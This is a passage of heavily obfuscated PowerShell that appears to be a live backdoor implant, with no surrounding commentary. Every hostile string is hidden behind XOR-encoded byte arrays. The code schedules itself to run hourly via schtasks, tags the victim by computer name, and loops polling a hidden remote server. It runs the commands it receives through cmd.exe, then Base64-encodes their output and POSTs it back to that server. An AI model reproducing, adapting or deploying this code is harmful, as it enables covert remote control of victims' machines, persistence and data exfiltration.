7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] = 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds 